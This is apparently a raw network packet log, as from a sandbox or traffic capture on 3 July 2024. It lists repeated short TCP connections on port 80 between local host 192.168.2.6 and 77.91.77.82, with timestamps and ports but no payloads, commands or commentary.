                                                                Jul 3, 2024 08:39:41.502193928 CEST4979680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:41.502475977 CEST4979780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:41.507348061 CEST804979777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:41.507416964 CEST804979677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:41.507456064 CEST4979780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:41.507673979 CEST4979780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:41.508162022 CEST4979680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:41.512439966 CEST804979777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:42.191684008 CEST804979777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:42.191745996 CEST4979780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:42.194967985 CEST4979780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:42.195319891 CEST4979880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:42.200346947 CEST804979877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:42.200510025 CEST804979777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:42.200515985 CEST4979880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:42.200577021 CEST4979780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:42.200829029 CEST4979880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:42.205789089 CEST804979877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:42.910371065 CEST804979877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:42.910495996 CEST4979880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:43.017939091 CEST4979880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:43.018384933 CEST4979980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:43.023144007 CEST804979877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:43.023273945 CEST4979880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:43.023464918 CEST804979977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:43.023534060 CEST4979980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:43.023694038 CEST4979980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:43.028445959 CEST804979977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:43.709501982 CEST804979977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:43.709563971 CEST4979980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:43.712507010 CEST4979980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:43.712793112 CEST4980080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:43.717562914 CEST804980077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:43.717771053 CEST4980080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:43.717780113 CEST804979977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:43.717914104 CEST4979980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:43.718136072 CEST4980080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:43.722925901 CEST804980077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:44.433881998 CEST804980077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:44.433934927 CEST4980080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:44.549947977 CEST4980080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:44.550365925 CEST4980180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:44.555198908 CEST804980177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:44.555382967 CEST4980180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:44.555574894 CEST4980180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:44.555855989 CEST804980077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:44.555948973 CEST4980080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:44.560347080 CEST804980177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:45.251692057 CEST804980177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:45.251912117 CEST4980180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:45.255484104 CEST4980180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:45.255816936 CEST4980280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:45.260633945 CEST804980277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:45.260742903 CEST4980280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:45.260745049 CEST804980177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:45.260791063 CEST4980180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:45.261115074 CEST4980280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:45.266103983 CEST804980277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:45.940557957 CEST804980277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:45.940705061 CEST4980280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:46.051711082 CEST4980280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:46.052120924 CEST4980380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:46.057590008 CEST804980377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:46.057668924 CEST4980380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:46.057852983 CEST804980277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:46.057902098 CEST4980280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:46.057909966 CEST4980380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:46.064860106 CEST804980377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:46.736747980 CEST804980377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:46.736955881 CEST4980380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:46.743426085 CEST4980380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:46.743719101 CEST4980480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:46.749037027 CEST804980477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:46.749170065 CEST4980480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:46.749661922 CEST804980377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:46.749809980 CEST4980380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:46.751538992 CEST4980480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:46.756472111 CEST804980477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:47.475090027 CEST804980477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:47.475168943 CEST4980480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:47.580766916 CEST4980480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:47.581243038 CEST4980580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:47.585871935 CEST804980477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:47.585947990 CEST4980480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:47.585988998 CEST804980577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:47.586240053 CEST4980580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:47.586425066 CEST4980580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:47.591181040 CEST804980577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:48.289243937 CEST804980577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:48.289486885 CEST4980580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:48.292844057 CEST4980580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:48.293163061 CEST4980680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:48.297894955 CEST804980577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:48.297956944 CEST804980677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:48.297971010 CEST4980580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:48.298043013 CEST4980680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:48.298333883 CEST4980680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:48.303136110 CEST804980677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:49.006681919 CEST804980677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:49.006768942 CEST4980680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:49.111484051 CEST4980680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:49.111985922 CEST4980780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:49.118868113 CEST804980777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:49.118983984 CEST4980780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:49.119259119 CEST4980780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:49.119396925 CEST804980677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:49.119471073 CEST4980680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:49.124094009 CEST804980777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:49.798993111 CEST804980777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:49.800945997 CEST4980780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:49.803849936 CEST4980780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:49.804177046 CEST4980880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:49.809020996 CEST804980877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:49.809237957 CEST804980777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:49.809350967 CEST4980780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:49.809369087 CEST4980880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:49.809591055 CEST4980880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:49.814549923 CEST804980877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:50.503118992 CEST804980877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:50.503242016 CEST4980880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:50.643389940 CEST4980880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:50.643975973 CEST4981080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:50.648731947 CEST804980877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:50.648783922 CEST4980880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:50.648905039 CEST804981077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:50.649133921 CEST4981080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:50.649600029 CEST4981080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:50.654448032 CEST804981077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:51.325709105 CEST804981077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:51.328829050 CEST4981080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:51.328829050 CEST4981080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:51.332909107 CEST4981180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:51.334244013 CEST804981077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:51.334307909 CEST4981080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:51.337759972 CEST804981177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:51.341310024 CEST4981180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:51.341310024 CEST4981180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:51.346179962 CEST804981177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:52.055053949 CEST804981177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:52.055123091 CEST4981180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:52.174729109 CEST4981180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:52.175164938 CEST4981280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:52.180613995 CEST804981177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:52.180655956 CEST804981277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:52.180668116 CEST4981180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:52.180788040 CEST4981280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:52.181128979 CEST4981280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:52.185892105 CEST804981277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:52.856702089 CEST804981277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:52.856894970 CEST4981280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:52.860721111 CEST4981280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:52.861072063 CEST4981380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:52.866404057 CEST804981277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:52.866554976 CEST4981280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:52.868915081 CEST804981377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:52.869082928 CEST4981380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:52.869369984 CEST4981380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:52.874602079 CEST804981377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:53.592888117 CEST804981377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:53.592972040 CEST4981380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:53.707972050 CEST4981380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:53.708334923 CEST4981480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:53.713213921 CEST804981477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:53.713350058 CEST4981480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:53.713592052 CEST804981377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:53.713701963 CEST4981380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:53.714144945 CEST4981480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:53.719068050 CEST804981477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:54.398621082 CEST804981477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:54.398869038 CEST4981480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:54.402451992 CEST4981480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:54.402942896 CEST4981580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:54.407782078 CEST804981477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:54.407861948 CEST804981577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:54.407921076 CEST4981480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:54.407963991 CEST4981580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:54.408502102 CEST4981580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:54.413328886 CEST804981577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:55.087243080 CEST804981577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:55.087310076 CEST4981580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:55.205775976 CEST4981580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:55.206182957 CEST4981680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:55.211433887 CEST804981677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:55.211522102 CEST4981680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:55.211667061 CEST4981680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:55.214735985 CEST804981577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:55.214818001 CEST4981580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:55.216413975 CEST804981677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:55.894499063 CEST804981677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:55.894570112 CEST4981680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:55.898410082 CEST4981680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:55.898977041 CEST4981780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:55.903655052 CEST804981677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:55.903841019 CEST4981680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:55.903971910 CEST804981777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:55.904031992 CEST4981780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:55.904335022 CEST4981780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:55.909459114 CEST804981777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:56.595387936 CEST804981777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:56.597027063 CEST4981780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:56.712830067 CEST4981780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:56.714427948 CEST4981880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:56.718077898 CEST804981777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:56.718158960 CEST4981780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:56.719264030 CEST804981877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:56.721002102 CEST4981880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:56.729664087 CEST4981880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:56.734580040 CEST804981877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:57.408189058 CEST804981877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:57.408301115 CEST4981880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:57.414135933 CEST4981880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:57.414505005 CEST4981980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:57.419390917 CEST804981877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:57.419426918 CEST804981977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:57.419461966 CEST4981880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:57.419667006 CEST4981980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:57.420891047 CEST4981980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:57.425757885 CEST804981977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:58.144654036 CEST804981977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:58.144741058 CEST4981980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:58.251866102 CEST4981980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:58.252222061 CEST4982080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:58.257194996 CEST804981977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:58.257215977 CEST804982077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:58.257263899 CEST4981980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:58.257311106 CEST4982080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:58.257594109 CEST4982080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:58.262367964 CEST804982077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:58.937751055 CEST804982077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:58.938138962 CEST4982080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:58.941442966 CEST4982080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:58.941829920 CEST4982180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:58.946767092 CEST804982177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:58.946784019 CEST804982077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:58.947134018 CEST4982180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:58.947694063 CEST4982080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:58.947698116 CEST4982180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:58.952517986 CEST804982177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:59.630352974 CEST804982177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:59.630455971 CEST4982180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:59.737369061 CEST4982180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:59.737771988 CEST4982280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:59.742834091 CEST804982277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:59.742929935 CEST4982280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:59.743061066 CEST4982280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:59.743119955 CEST804982177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:39:59.743421078 CEST4982180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:39:59.748488903 CEST804982277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:00.420978069 CEST804982277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:00.421057940 CEST4982280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:00.424068928 CEST4982280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:00.424413919 CEST4982380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:00.429347992 CEST804982377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:00.429420948 CEST804982277.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:00.429440022 CEST4982380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:00.429467916 CEST4982280192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:00.429784060 CEST4982380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:00.434607983 CEST804982377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:01.109735966 CEST804982377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:01.110349894 CEST4982380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:01.271784067 CEST4982380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:01.272330999 CEST4982480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:01.277262926 CEST804982477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:01.277282953 CEST804982377.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:01.277343035 CEST4982480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:01.277395010 CEST4982380192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:01.279160023 CEST4982480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:01.284377098 CEST804982477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:01.973634005 CEST804982477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:01.973711014 CEST4982480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:01.978368044 CEST4982480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:01.978737116 CEST4982580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:01.983577967 CEST804982577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:01.983647108 CEST4982580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:01.983652115 CEST804982477.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:01.983747005 CEST4982480192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:01.984355927 CEST4982580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:01.989243031 CEST804982577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:02.678808928 CEST804982577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:02.679140091 CEST4982580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:02.784223080 CEST4982580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:02.784538984 CEST4982680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:02.789381981 CEST804982677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:02.789494038 CEST804982577.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:02.789567947 CEST4982580192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:02.789601088 CEST4982680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:02.789892912 CEST4982680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:02.794713974 CEST804982677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:03.481010914 CEST804982677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:03.481086969 CEST4982680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:03.485152960 CEST4982680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:03.485539913 CEST4982780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:03.490369081 CEST804982777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:03.490462065 CEST4982780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:03.490494013 CEST804982677.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:03.490540981 CEST4982680192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:03.490766048 CEST4982780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:03.495599985 CEST804982777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:04.188924074 CEST804982777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:04.189017057 CEST4982780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:04.312872887 CEST4982780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:04.313251019 CEST4982880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:04.318161964 CEST804982877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:04.318239927 CEST804982777.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:04.318258047 CEST4982880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:04.318289042 CEST4982780192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:04.318608999 CEST4982880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:04.323676109 CEST804982877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:04.995646000 CEST804982877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:04.997018099 CEST4982880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:05.004663944 CEST4982880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:05.005002975 CEST4982980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:05.010004044 CEST804982977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:05.010020971 CEST804982877.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:05.010081053 CEST4982980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:05.010111094 CEST4982880192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:05.010330915 CEST4982980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:05.015108109 CEST804982977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:05.694385052 CEST804982977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:05.694444895 CEST4982980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:05.800014973 CEST4982980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:05.800324917 CEST4983080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:05.805135965 CEST804983077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:05.805164099 CEST804982977.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:05.805227995 CEST4982980192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:05.805239916 CEST4983080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:05.805475950 CEST4983080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:05.810198069 CEST804983077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:06.482870102 CEST804983077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:06.482937098 CEST4983080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:06.486819029 CEST4983080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:06.487257957 CEST4983180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:06.492119074 CEST804983177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:06.492168903 CEST804983077.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:06.492197990 CEST4983180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:06.492228031 CEST4983080192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:06.492374897 CEST4983180192.168.2.677.91.77.82
                                                                Jul 3, 2024 08:40:06.497114897 CEST804983177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:07.181078911 CEST804983177.91.77.82192.168.2.6
                                                                Jul 3, 2024 08:40:07.181253910 CEST4983180192.168.2.677.91.77.82
